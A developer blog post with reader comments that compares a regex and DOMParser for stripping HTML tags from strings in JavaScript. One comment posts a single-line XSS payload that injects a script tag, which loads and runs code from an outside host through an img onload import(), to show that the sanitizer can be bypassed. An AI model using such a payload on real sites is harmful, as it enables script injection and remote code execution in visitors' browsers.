Alvison Hunter Arnuero | Front-End Web Developer

Posted on Jul 13, 2022 • Edited on Jun 8, 2024

Removing HTML Tags with RegEx or DOMParser() in JavaScript

#webdev #programming #javascript #regex

Howdy folks! Have you ever needed to sanitize strings containing HTML tags in server responses? Let me show you two methods to do this using JavaScript.

In one of my past projects, a translation app, we sent data from the Zendesk platform to our app and then to the DeepL Translator API to get English translations from various languages. The strings received from Zendesk contain HTML tags in entity-encoded (ASCII/symbol) format (e.g., &lt;h2&gt;Server Response&lt;/h2&gt;), and the DeepL Translator API sometimes returns these tags in HTML format (e.g., <h2>Server Response</h2>).

While these formats render the same, they cause issues when comparing strings to avoid repetitions in the translated text container in the UI.

To address this, I extract only the plain text from the string received from Zendesk, as the client wants a text-only display. Using the replace method, I can remove the HTML tags from the string.
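To make the comparison problem concrete, here is a minimal sketch of how the two formats could be reduced to the same plain text before checking for repeats. The helper names (decodeBasicEntities, toComparableText) are made up for illustration, the entity list covers only five common entities, and the tag stripping leans on the regex approach covered below, so treat it as a rough idea rather than the code from the project.

```javascript
// Hypothetical lookup table: only the five most common entities are handled.
const ENTITY_MAP = { lt: '<', gt: '>', amp: '&', quot: '"', '#39': "'" };

// Hypothetical helper: decode entities in a single pass so that
// "&amp;lt;" becomes "&lt;" and is not decoded a second time.
const decodeBasicEntities = (input) =>
  input.replace(/&(lt|gt|amp|quot|#39);/g, (_, name) => ENTITY_MAP[name]);

// Hypothetical helper: bring either format down to comparable plain text.
const toComparableText = (input) =>
  decodeBasicEntities(input).replace(/<[^>]+>/g, '').trim();

const fromZendesk = '&lt;h2&gt;Server Response&lt;/h2&gt;';
const fromDeepL = '<h2>Server Response</h2>';

console.log(toComparableText(fromZendesk)); // Server Response
console.log(toComparableText(fromZendesk) === toComparableText(fromDeepL)); // true
```

Once both strings go through the same normalization, a plain === comparison is enough to spot a repeated translation.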

Allow me to introduce two straightforward methods to accomplish this task. While both methods are effective, I'll outline the advantages and disadvantages of each to help you make an informed decision:

First Version

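/**
* Returns a string containing plain text format
* @param {string} strToSanitize - String to be sanitized
* @returns {string} - The input string with HTML tags removed
*/
export const clearHTMLTags = (strToSanitize) => {
  // Remove every "<...>" sequence; g replaces all matches, not just the first
  return strToSanitize.replace(/(<([^>]+)>)/gi, '');
}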

Pros:

Simple and straightforward.
Uses a regular expression to remove HTML tags.

Cons:

Regular expressions can be brittle and may not cover all edge cases.
Breaks when a > appears inside a comment or an attribute value, and on malformed HTML.
Not the most secure method for handling HTML content.

The function uses a regular expression, /(<([^>]+)>)/gi, to match every opening and closing HTML tag in a given string. The g flag makes the search global, so every occurrence is matched rather than just the first, and the i flag makes it case-insensitive (which has no effect here, since the pattern contains no letters). Using the replace method with this regex and an empty string as the replacement removes the matched tags, producing a string suitable for plain text display.
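Here is a small sketch of what the flags do in practice. The names TAG_PATTERN and stripTagsWithRegex are just for this example, and the pattern drops the capture groups and the i flag since neither changes the result.

```javascript
// Same idea as the pattern above, without the unused capture groups.
const TAG_PATTERN = /<[^>]+>/g;

// Hypothetical helper name, equivalent in behavior to clearHTMLTags.
const stripTagsWithRegex = (input) => input.replace(TAG_PATTERN, '');

const sample = '<H2 class="title">Server <em>Response</em></H2>';

// With the g flag, every tag is removed (uppercase tags included).
console.log(stripTagsWithRegex(sample)); // Server Response

// Without the g flag, only the first match is replaced.
const firstOnly = sample.replace(/<[^>]+>/, '');
console.log(firstOnly); // Server <em>Response</em></H2>
```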

However, the pattern treats the first > after a < as the end of a tag, so a > inside a comment or attribute value cuts the match short and leaves debris behind, and a stray < in ordinary text can swallow content up to the next >. For inputs like these, a more robust solution is recommended.
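To see where the regex version struggles, here are three inputs run through the same pattern. The function is a copy of clearHTMLTags without the export so the snippet runs on its own, and the sample strings are made up for illustration (the first one comes from the comment thread on this post).

```javascript
// Local copy of the first version, so the snippet is self-contained.
const clearHTMLTags = (strToSanitize) =>
  strToSanitize.replace(/(<([^>]+)>)/gi, '');

// 1. A ">" inside a comment ends the match too early.
const withComment = clearHTMLTags("<!--  don't > use Regex --><h1>Test</h1>");
console.log(JSON.stringify(withComment)); // " use Regex -->Test"

// 2. A ">" inside an attribute value does the same.
const withAttribute = clearHTMLTags('<a title="a > b">link</a>');
console.log(JSON.stringify(withAttribute)); // " b\">link"

// 3. Plain text with "<" and ">" gets treated as a tag and removed.
const plainMath = clearHTMLTags('2 < 3 and 5 > 4');
console.log(JSON.stringify(plainMath)); // "2  4"
```

JSON.stringify is only there to make the leading and doubled spaces visible in the console.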

Second Version

/**
* Returns a string containing plain text format by removing HTML tags
* @param {string} strToSanitize - String to be sanitized
* @returns {string} - Sanitized plain text string
*/
const betterClearHTMLTags = (strToSanitize) => {
  try {
    const doc = new DOMParser().parseFromString(strToSanitize, 'text/html');
    return doc.body.textContent || '';
  } catch (error) {
    console.error("Error parsing HTML string:", error);
    return '';
  }
}

let myHTML = `<!--  don't > use Regex --><h1>Testing without Regex</h1>`

console.log(
  betterClearHTMLTags(myHTML)
)
// output: Testing without Regex

Pros:

Uses the DOMParser API, which is designed to parse HTML and XML.
Handles nested tags and malformed HTML more gracefully.
Safer and more reliable for sanitizing HTML content.

Cons:

Slightly more complex than using a regular expression.
Depends on the availability of the DOMParser API, which is built into modern browsers but not into Node.js; on the server you need a library such as jsdom to provide it.
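If the same code has to run in both places, one option is to check for DOMParser at runtime and fall back to the regex when it is missing. This is only a sketch under that assumption: stripTags is a hypothetical name, and the fallback branch carries all the regex limitations listed for the first version.

```javascript
// Hypothetical wrapper: prefer the parser, fall back to the regex.
const stripTags = (input) => {
  if (typeof DOMParser !== 'undefined') {
    // Browser (or any environment that defines DOMParser globally).
    const doc = new DOMParser().parseFromString(input, 'text/html');
    return doc.body.textContent || '';
  }
  // Plain Node.js: no DOMParser, so use the simpler and less reliable regex.
  return input.replace(/<[^>]+>/g, '');
};

console.log(stripTags('<h1>Hello <em>world</em></h1>')); // Hello world
```

For well-formed input like this, both branches give the same result; they only diverge on the tricky cases such as comments or attributes containing >.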

Function Enhancements
The second version, betterClearHTMLTags, is more accurate and follows best practices for the following reasons:

Accuracy: It correctly handles comments, attribute values, and malformed HTML, which trip up regular expressions.
Security: A built-in HTML parser is less error-prone than a hand-written regular expression. Keep in mind that the result is plain text, not sanitized HTML: it can still contain < and > characters (for example, from the body of a <script> element or from decoded entities), so write it to the page with textContent rather than innerHTML.
Robustness: HTML entities are decoded, so &amp; comes back as & in the plain text.
Error Handling: The try/catch block returns an empty string if parsing throws, for example when DOMParser is not defined.

Well, folks, I trust you'll find these functions useful for extracting plain text from HTML strings in your projects. Thank you for reading, and I sincerely hope you found this article as enjoyable to read as it was for me to write. Stay tuned for more content in the future!

❤️ Enjoyed the article? Your feedback fuels more content.
💬 Share your thoughts in a comment.
🔖 No time to read now? Well, Bookmark for later.
🔗 If it helped, pass it on, dude!

Top comments (4)

Frank Wisniewski • Jul 13 '22 • Edited

Never use Regex to parse HTML

const clearHTMLTags = (strToSanitize) => {
  return strToSanitize.replace(/(<([^>]+)>)/gi, '');
}
let myHTML = `<!--  don't > use Regex --><h1>Test</h1>`

console.log(
  clearHTMLTags(myHTML)
)
// output: use Regex -->Test


// The right way

const betterClearHTMLTags = (strToSanitize) => {
  let myHTML = new DOMParser()
    .parseFromString(strToSanitize, 'text/html');
    return myHTML.body.textContent || '';
}
console.log(
  betterClearHTMLTags(myHTML)
)
 // output: Test

Alvison Hunter Arnuero | Front-End Web Developer • Jul 13 '22 • Edited

Awesome! This is an excellent approach, let me share it in the post if you don't mind and refer your profile as a reference. Thanks for this, pal!

Samuel Eiche • Jun 7 '23 • Edited

That won't work for something like

betterClearHTMLTags(`\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>`)

JWP • Jul 13 '22

Not for me